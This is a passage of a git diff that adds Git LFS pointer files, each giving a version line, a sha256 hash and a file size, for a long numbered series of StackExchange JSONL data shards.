0000000000000000000000000000000000000000..aca6109491ae060203924a69bf02ccbf3518c4ad --- /dev/null +++ b/data/stackexchange/1-1/2142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95fb1881996130d27eb529325dafef1eaaa7419ebe53ed6690690a00180e8887 +size 34242572 diff --git a/data/stackexchange/1-1/2143_2289.jsonl b/data/stackexchange/1-1/2143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61d415c67d55142df7fc71ef6adf18ab78df1519 --- /dev/null +++ b/data/stackexchange/1-1/2143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57f04b1b01fcb2f3ab38f559a30cf0bd2ad398d3e3766cba127bd7cb953c6846 +size 33755031 diff --git a/data/stackexchange/1-1/2144_2289.jsonl b/data/stackexchange/1-1/2144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46f691b90cf1036be23090f6d39ae33a188b5d80 --- /dev/null +++ b/data/stackexchange/1-1/2144_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d4570c61f568041f3ee380f80dac9b7b359ff8a2d30b71b500e55822661dfcf9 +size 33744324 diff --git a/data/stackexchange/1-1/2145_2289.jsonl b/data/stackexchange/1-1/2145_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8f2dd2b3431686de2825564a9a04589684f3110 --- /dev/null +++ b/data/stackexchange/1-1/2145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:982e8eba2220c49ddba9523f0bc185060fe21755aec6a247c310aa99dc3a2375 +size 33818405 diff --git a/data/stackexchange/1-1/2146_2289.jsonl b/data/stackexchange/1-1/2146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..682a39e127e6c182710a84adeb95b01303a4ee3c --- /dev/null +++ b/data/stackexchange/1-1/2146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7cf8212b288ffb8e71f96a1458a0f6a9225b3622217b546683818fc41275987 +size 32884364 diff --git a/data/stackexchange/1-1/2147_2289.jsonl b/data/stackexchange/1-1/2147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e14d3eb0b77fb3d9710238d3b37ff7e87013680a --- /dev/null +++ b/data/stackexchange/1-1/2147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6334013ccc62639746f9d4ba0d841e1ef54fd70fbf23e691abf83511d2de49ec +size 34136160 diff --git a/data/stackexchange/1-1/2148_2289.jsonl b/data/stackexchange/1-1/2148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a7c76cae41603ba46df5b27c14b70c7ed5e6ae6 --- /dev/null +++ b/data/stackexchange/1-1/2148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b29fef1eb2263619ed12227efac96e0b37cc84cff8d50c54548367dd2bbd907 +size 33611836 diff --git a/data/stackexchange/1-1/2149_2289.jsonl b/data/stackexchange/1-1/2149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46df2f13b1e3a62dbb1087b7d360f9795bbf80f8 --- /dev/null +++ b/data/stackexchange/1-1/2149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6047cf190bfb142405dfb0948a268e3cc462b85f47cdf61a1110411b9d50b3cd +size 33574284 diff --git a/data/stackexchange/1-1/214_2289.jsonl b/data/stackexchange/1-1/214_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c91ee8b175e9d774c9314cf09ef9e93f5facfa93 --- /dev/null +++ b/data/stackexchange/1-1/214_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adb9cfc1df7f276a559b8e2db1671b99c70bea5a84204ca457e3cbaf44e4bdce +size 36709146 diff --git a/data/stackexchange/1-1/2150_2289.jsonl b/data/stackexchange/1-1/2150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1779e9b9de88e2c81eae8ff13b8beeccb7eac83d --- /dev/null +++ b/data/stackexchange/1-1/2150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73e40d1ec91c08751cb8e8588ad299b4627537351701ba673fe86b1b928ffc85 +size 33974110 diff --git a/data/stackexchange/1-1/2151_2289.jsonl b/data/stackexchange/1-1/2151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ee4411262eca5ea6eff564d432574d1931a3295 --- /dev/null +++ b/data/stackexchange/1-1/2151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:598192acbe4dc5673960d6e7df252ee0f3f891195367b36b9f112ed98788025f +size 33933096 diff --git a/data/stackexchange/1-1/2152_2289.jsonl b/data/stackexchange/1-1/2152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d03eb1ee7728c31ef8652790613a0b88ffc989bd --- /dev/null +++ b/data/stackexchange/1-1/2152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e38f4b16aedd7401673b66545ecabbcb8731faed36265e3366b5f7cd9a5e316b +size 33867363 diff --git a/data/stackexchange/1-1/2153_2289.jsonl b/data/stackexchange/1-1/2153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..722628fea50e24bc525b4f93f2544158afb69774 --- /dev/null +++ b/data/stackexchange/1-1/2153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d08298b72bb795ae2a2f08b4738a62a1ac3cbaf70e9453d7ff1a9e849bb8196 +size 33389318 diff --git a/data/stackexchange/1-1/2154_2289.jsonl b/data/stackexchange/1-1/2154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ef3a242e88d474ba98967dd53234d60eb5a97f9 --- /dev/null +++ b/data/stackexchange/1-1/2154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8c816545f9b9f31869fabce75a338b92d247f6c9eb9c8fbdca046e8da6652a5 +size 34006706 diff --git a/data/stackexchange/1-1/2155_2289.jsonl b/data/stackexchange/1-1/2155_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68dd956348cde6fb04b67a3e7b281b4e7cfa6aca --- /dev/null +++ b/data/stackexchange/1-1/2155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d15cb32764054d4272b6924a68a75d61de3cf693e52da898a05e77953cfe071 +size 33937963 diff --git a/data/stackexchange/1-1/2156_2289.jsonl b/data/stackexchange/1-1/2156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..977da67fb1f0ffefa5b6c66706a3cce195cf1ee7 --- /dev/null +++ b/data/stackexchange/1-1/2156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9d836f5d0cab8e0948b7d7dfa3be454ae63a8943fac303f99a3a5a3b7c11470 +size 34071821 diff --git a/data/stackexchange/1-1/2157_2289.jsonl b/data/stackexchange/1-1/2157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..662d733270cc3c044f2ce74b3c0f0611932533c1 --- /dev/null +++ b/data/stackexchange/1-1/2157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a1533a1fdcf9985f1fd8f48d559d1e55facfdc2bc9af04c412a2e24580f735b +size 34240276 diff --git a/data/stackexchange/1-1/2158_2289.jsonl b/data/stackexchange/1-1/2158_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b283236064ec21d017b5d1251d4cb83a27b56e --- /dev/null +++ b/data/stackexchange/1-1/2158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a6fad01923b59c28b9f8bf3dd92b1c596128242b57a0f70506f541943cef94e +size 33804451 diff --git a/data/stackexchange/1-1/2159_2289.jsonl b/data/stackexchange/1-1/2159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a292955bc36279b505b5679c183a87ba326d4cb --- /dev/null +++ b/data/stackexchange/1-1/2159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a72935b191b54ac8fb5d15fa75c5ea69abcf40c762cd94941dd7f0551159b28 +size 33977548 diff --git a/data/stackexchange/1-1/215_2289.jsonl b/data/stackexchange/1-1/215_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5be9df87712a6183dee9fdcff0ab7325d3c270b5 --- /dev/null +++ b/data/stackexchange/1-1/215_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93752af3c971cdd366237a6fae29669fa208bc16ed0e341ac3efe3c5c4cb1e2f +size 37514738 diff --git a/data/stackexchange/1-1/2160_2289.jsonl b/data/stackexchange/1-1/2160_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..349a15ecf27ed858098fb527cff1bb656f489c12 --- /dev/null +++ b/data/stackexchange/1-1/2160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:773a393824e418e569b404a3961f8bdc56a7a7a9ee5cd389289f97e8208a6348 +size 34221590 diff --git a/data/stackexchange/1-1/2161_2289.jsonl b/data/stackexchange/1-1/2161_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..44bf7a476417dcb3dfddbb9e2e3596840d8513f3 --- /dev/null +++ b/data/stackexchange/1-1/2161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:721a93a9a6cda84ddb783991aeb653d788321e8a740098ff99f2b9399485f509 +size 33334052 diff --git a/data/stackexchange/1-1/2162_2289.jsonl b/data/stackexchange/1-1/2162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18908f1931a8ec833edb43f87173605cc2d67644 --- /dev/null +++ b/data/stackexchange/1-1/2162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e782464e7e4cc3cc2b8831a9304d5938c002e10122469d97ddf4ae08d21ce84a +size 34019648 diff --git a/data/stackexchange/1-1/2163_2289.jsonl b/data/stackexchange/1-1/2163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bdcf3a473058b334ae6a8ca55fd9765de258e6c --- /dev/null +++ b/data/stackexchange/1-1/2163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8002ed38be798545030c97dff3acdb896cb9c2dbace55be2e82b9c6032d7f0d +size 33577388 diff --git a/data/stackexchange/1-1/2164_2289.jsonl b/data/stackexchange/1-1/2164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bdff680e9210385dba04c6982c4fe9b0270b1cd --- /dev/null +++ b/data/stackexchange/1-1/2164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deae1b0197a0c7177477385d0b32577a80cbf0323fa66c9b2b0b78a29d766851 +size 34024087 diff --git a/data/stackexchange/1-1/2165_2289.jsonl b/data/stackexchange/1-1/2165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25b746435be450825d93fbf009e3d1e50f794085 --- /dev/null +++ b/data/stackexchange/1-1/2165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9c45a4b6a021ecc5e39fefea0f53ccf9d349e778d936f0d2c32ea8fa0ec3373 +size 33837081 diff --git a/data/stackexchange/1-1/2166_2289.jsonl b/data/stackexchange/1-1/2166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62a4bffa8612524d6d29b13968d51d56fed44646 --- /dev/null +++ b/data/stackexchange/1-1/2166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c213c4acfc8a83a62e535506334b85eaf5c1bc838ef8b78c8115f070db2e11b +size 34554210 diff --git a/data/stackexchange/1-1/2167_2289.jsonl b/data/stackexchange/1-1/2167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b163487b690f47b60be6b4ecbd62d5108c9e913 --- /dev/null +++ b/data/stackexchange/1-1/2167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c198a4c654873d11b572d6d4a694283319f0ed96be68ddcfe6c655124fc56e01 +size 33952261 diff --git a/data/stackexchange/1-1/2168_2289.jsonl b/data/stackexchange/1-1/2168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..112451eeaa42518562635699484945b8eb134d74 --- /dev/null +++ b/data/stackexchange/1-1/2168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e329be5342d3eb0caf19bf923a03f1e6bde3a50bf00baa2600e45df5706988c8 +size 33690451 diff --git a/data/stackexchange/1-1/2169_2289.jsonl b/data/stackexchange/1-1/2169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ee49c4ae8bdc3832d99f92de147609dd768ee5d7 --- /dev/null +++ b/data/stackexchange/1-1/2169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6ac379446224e0a2480e40f82a745a7988e0b995984ac798267ea69e3f7cbd9 +size 33931510 diff --git a/data/stackexchange/1-1/216_2289.jsonl b/data/stackexchange/1-1/216_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9ce55ec883ca66dc008992fce45c0da8d0083ab --- /dev/null +++ b/data/stackexchange/1-1/216_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ac67be2d6613b477221fe6d588cfca671c07ef63141d3382119add69a46111 +size 37372273 diff --git a/data/stackexchange/1-1/2170_2289.jsonl b/data/stackexchange/1-1/2170_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3fbd35a6cb816e3b38687b3732b7984a621a590 --- /dev/null +++ b/data/stackexchange/1-1/2170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e66f934bc6aa12a5d23d8b1f54af8f57c377299cbd767987818d412929ee9d59 +size 33906443 diff --git a/data/stackexchange/1-1/2171_2289.jsonl b/data/stackexchange/1-1/2171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ea4c8c0518c0363144a3e40853943649c6c33d1 --- /dev/null +++ b/data/stackexchange/1-1/2171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12ad5d0934f2134cf4294e8dadfa65ffdaebd85a234c559f1f4fe301bb1ded20 +size 33935623 diff --git a/data/stackexchange/1-1/2172_2289.jsonl b/data/stackexchange/1-1/2172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..72aa3cb2b7bf54cf30ec467a22c2dabd8e0b7d62 --- /dev/null +++ b/data/stackexchange/1-1/2172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5e755f9a7a4223455e5754dda76be5e4b710bd621246d1213a59135f22ac405 +size 33752032 diff --git a/data/stackexchange/1-1/2173_2289.jsonl b/data/stackexchange/1-1/2173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7d0fcb610f4094ed7febd934029ff37179cb530 --- /dev/null +++ b/data/stackexchange/1-1/2173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a623bd002f935a1f393c188af9e6e5adcf279be09b98d273f360e2faa083bf1c +size 33951012 diff --git a/data/stackexchange/1-1/2174_2289.jsonl b/data/stackexchange/1-1/2174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45b7071b7bd835a4dc95de079da8e75be41167fd --- /dev/null +++ b/data/stackexchange/1-1/2174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e66773908710163d7912764d3c97008ac1d821c7524881dea9746cc449dfab9 +size 34256795 diff --git a/data/stackexchange/1-1/2175_2289.jsonl b/data/stackexchange/1-1/2175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5608d11325eae5fd9868b53439b2f1d0d4a5363f --- /dev/null +++ b/data/stackexchange/1-1/2175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf05ab4370c0ff5f86d3df4692534328af2a40f7ef23ecd70756bf8400eb6df +size 34072236 diff --git a/data/stackexchange/1-1/2176_2289.jsonl b/data/stackexchange/1-1/2176_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3eeae2ba648711fd310f4930b6536e901e15d1d --- /dev/null +++ b/data/stackexchange/1-1/2176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b98b565ef6ef1a1bb62f5f4b0c963d4f371d07aa0a0a1c77ace9a26f84e98ccc +size 34069127 diff --git a/data/stackexchange/1-1/2177_2289.jsonl b/data/stackexchange/1-1/2177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4b35ff5bc1dffdec51807e2c10f7f6b66819b82 --- /dev/null +++ b/data/stackexchange/1-1/2177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47ab77b142aee2638ddbde4f982b37a7e1a050c4fba0b248b1dfce4787c4eb8f +size 33850721 diff --git a/data/stackexchange/1-1/2178_2289.jsonl b/data/stackexchange/1-1/2178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75ea80e6804b8383758cd399cf8f21924198300d --- /dev/null +++ b/data/stackexchange/1-1/2178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1812c056fb644669f3fe4320d8e932fe24f5b05363ea566774b0db0c0388c37 +size 33527965 diff --git a/data/stackexchange/1-1/2179_2289.jsonl b/data/stackexchange/1-1/2179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ebf082b8b705209869606285e093fde0d96c8f4 --- /dev/null +++ b/data/stackexchange/1-1/2179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e2ad9694ccd2399a268a3a702c4934a9fc235dbfef603360da8c1233d2f9ae5 +size 34142816 diff --git a/data/stackexchange/1-1/217_2289.jsonl b/data/stackexchange/1-1/217_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..278e84d2de6519924f7125869d4a159db1eae412 --- /dev/null +++ b/data/stackexchange/1-1/217_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1e99c2326e0c9560411de794dc18c0fc6ed6c37cadd7657159d7d158240d84 +size 37515132 diff --git a/data/stackexchange/1-1/2180_2289.jsonl b/data/stackexchange/1-1/2180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93a025043e43ecc4354615e6e78242d94e809370 --- /dev/null +++ b/data/stackexchange/1-1/2180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:035b30f4c6d1cc1decf84fa1ef89f25cfad463fe81b84cb65e270129bfbc0c6a +size 33703924 diff --git a/data/stackexchange/1-1/2181_2289.jsonl b/data/stackexchange/1-1/2181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..132b70ebb18a08b6665e5d112a7e6963256d7650 --- /dev/null +++ b/data/stackexchange/1-1/2181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b8004bd97b89eda8eb909f85a39da123a1a394c9d984ee5b406d147c247767a +size 34313934 diff --git a/data/stackexchange/1-1/2182_2289.jsonl b/data/stackexchange/1-1/2182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eec32fe0b664af6bd4669d7a80363b68025e9d07 --- /dev/null +++ b/data/stackexchange/1-1/2182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e0cf49b18eb1310b0d57f591ae833e3c9affeedbb8bed47b8a21012e74bb81b +size 34240652 diff --git a/data/stackexchange/1-1/2183_2289.jsonl b/data/stackexchange/1-1/2183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9828d266695878a5c395fdd62b75659f479f433f --- /dev/null +++ b/data/stackexchange/1-1/2183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b226b56c36dc4b887ba9cc79f594cb37d3a867d70f340b78c269932f300044ae +size 33695512 diff --git a/data/stackexchange/1-1/2184_2289.jsonl b/data/stackexchange/1-1/2184_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da28759da8ccd82b53fd3500d7d05eb95bce780f --- /dev/null +++ b/data/stackexchange/1-1/2184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c92b6b8875b464edcaf705cfe14d3b8db9eddaed8f76e9119abd23399d51c5a9 +size 34732166 diff --git a/data/stackexchange/1-1/2185_2289.jsonl b/data/stackexchange/1-1/2185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10c95a54c0e8ccb1b1cb613ece3a25e81127dcbe --- /dev/null +++ b/data/stackexchange/1-1/2185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6fa4d0e67af49daa1b748bb787ebea715d6bc745c8a2fd21ab8bdbcdaa40257e +size 33535363 diff --git a/data/stackexchange/1-1/2186_2289.jsonl b/data/stackexchange/1-1/2186_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67c86c5bdb4dfdf142b89aa4e6bddcee6efba275 --- /dev/null +++ b/data/stackexchange/1-1/2186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93b3afa45d60912da048f674afe6ef120e8ae3622f22b4905fb6dd307397116b +size 33973059 diff --git a/data/stackexchange/1-1/2187_2289.jsonl b/data/stackexchange/1-1/2187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fb359f933a452ee66dcfcad4946659f604ce6ca --- /dev/null +++ b/data/stackexchange/1-1/2187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bab6ca9194bc56c4d36c6dc9cba06c450b74feb583f840a348c5df74286a10cd +size 33812484 diff --git a/data/stackexchange/1-1/2188_2289.jsonl b/data/stackexchange/1-1/2188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec31379af8495a400b715fe745b69d5dc2c228ed --- /dev/null +++ b/data/stackexchange/1-1/2188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebd4a09d8bead9d1cd86e673f106d8c9d859e711e5169c32a86863540b8afba6 +size 33866108 diff --git a/data/stackexchange/1-1/2189_2289.jsonl b/data/stackexchange/1-1/2189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21a7f52bb1042b30c473e8a944f9c6e440635772 --- /dev/null +++ b/data/stackexchange/1-1/2189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:225779202ec193db911118be7748ac4cd3157107caf1ebd0d2de772519c71b31 +size 38474522 diff --git a/data/stackexchange/1-1/218_2289.jsonl b/data/stackexchange/1-1/218_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0444ba9cca401b53bfe07f5a45d18dd11876bcc --- /dev/null +++ b/data/stackexchange/1-1/218_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71c8c517a54865e78f790a7575ff757a65439e54c26b9fe32c03eb85240f2fbb +size 37383238 diff --git a/data/stackexchange/1-1/2190_2289.jsonl b/data/stackexchange/1-1/2190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4c61323a2efe49d5b2b9c11a3ea8fb8f5114988 --- /dev/null +++ b/data/stackexchange/1-1/2190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b86bd213b3b00dfd8c932ed1efec320bf61f561f2fe0eb9dfe7da25052cb4c7 +size 39348988 diff --git a/data/stackexchange/1-1/2191_2289.jsonl b/data/stackexchange/1-1/2191_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19a5673d81bef5967a2943082a4e3becd9f786f7 --- /dev/null +++ b/data/stackexchange/1-1/2191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94ecadeda091348b2e16cd49f36fdc1f4eabd1c9aa99ce41820104dd02796390 +size 40476113 diff --git a/data/stackexchange/1-1/2192_2289.jsonl b/data/stackexchange/1-1/2192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..deafac47b9bf17d5416d1b204e8cdb8cdedba71e --- /dev/null +++ b/data/stackexchange/1-1/2192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:061a830f41889ef0e1a8e798cf54b6d58ba1b4b562caf7afe8e0bf4baeb3e8d5 +size 39231403 diff --git a/data/stackexchange/1-1/2193_2289.jsonl b/data/stackexchange/1-1/2193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..edbbf182fdc3a757f5beb8fe8ac59fd2cba8415a --- /dev/null +++ b/data/stackexchange/1-1/2193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b87227cc1933df398c5cbeb40749d643f6e0804f101137dc5658bf47f71910b0 +size 39005409 diff --git a/data/stackexchange/1-1/2194_2289.jsonl b/data/stackexchange/1-1/2194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..115de84ffcd6c8857602de78eea705abee6312ea --- /dev/null +++ b/data/stackexchange/1-1/2194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0490c325374be3f0abd605823a8ed219340838b74bee088b9b762151f7825d31 +size 40023155 diff --git a/data/stackexchange/1-1/2195_2289.jsonl b/data/stackexchange/1-1/2195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db2040d4da594d3d31c7ebe12cedc89095592959 --- /dev/null +++ b/data/stackexchange/1-1/2195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a95ed8fba748fb9fb399ce90847539ca90cfdac7bb2f8eb9655e093e750bb662 +size 38871684 diff --git a/data/stackexchange/1-1/2196_2289.jsonl b/data/stackexchange/1-1/2196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f6c4fad3ea3cf231c4c2e625613b6abbcaf8f2d --- /dev/null +++ b/data/stackexchange/1-1/2196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f7e8b4a862be6f5355681afc913d5c06c19efc56b67236dc09a14c9847bf5f9 +size 39902224 diff --git a/data/stackexchange/1-1/2197_2289.jsonl b/data/stackexchange/1-1/2197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b8b915eb4ab0622b51a8229ccb4828d621e0c41 --- /dev/null +++ b/data/stackexchange/1-1/2197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25874c98487410a3e9db16b37997c0ced648d506d1bf3c37c4f1b3efb65bcce3 +size 39047943 diff --git a/data/stackexchange/1-1/2198_2289.jsonl b/data/stackexchange/1-1/2198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..511c611e8ece06e2cb10c7ae1c1a56094acfb2ca --- /dev/null +++ b/data/stackexchange/1-1/2198_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:861b63a24c4fed5bc77aab47479ce573bf827a78dd4881c1fdc7328b50af1ab4 +size 39670467 diff --git a/data/stackexchange/1-1/2199_2289.jsonl b/data/stackexchange/1-1/2199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..723365846f1a7c6238d2778bf27b0bc25378a54c --- /dev/null +++ b/data/stackexchange/1-1/2199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1bf1b92ae316292698e26f6dabf0805e8579e653745da580ea89c9566799533 +size 39325684 diff --git a/data/stackexchange/1-1/219_2289.jsonl b/data/stackexchange/1-1/219_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4538c69e06b3969bb0184b664117c019b41e7877 --- /dev/null +++ b/data/stackexchange/1-1/219_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8aea7c5d3a87c67487585736a9a716b304306ef2367e71b82e9dd8c8c3866c30 +size 38270821 diff --git a/data/stackexchange/1-1/21_2289.jsonl b/data/stackexchange/1-1/21_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aab5011fa61110191a417dd741c225eb2a2540d8 --- /dev/null +++ b/data/stackexchange/1-1/21_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a3c0e8b44a0f0cb877c2dfc9d5e5ee1cbe110ae157b04997ec3e2e19c567286 +size 35747304 diff --git a/data/stackexchange/1-1/2200_2289.jsonl b/data/stackexchange/1-1/2200_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c83c9946c861f4f62bcfa000f2ec31e925456e3 --- 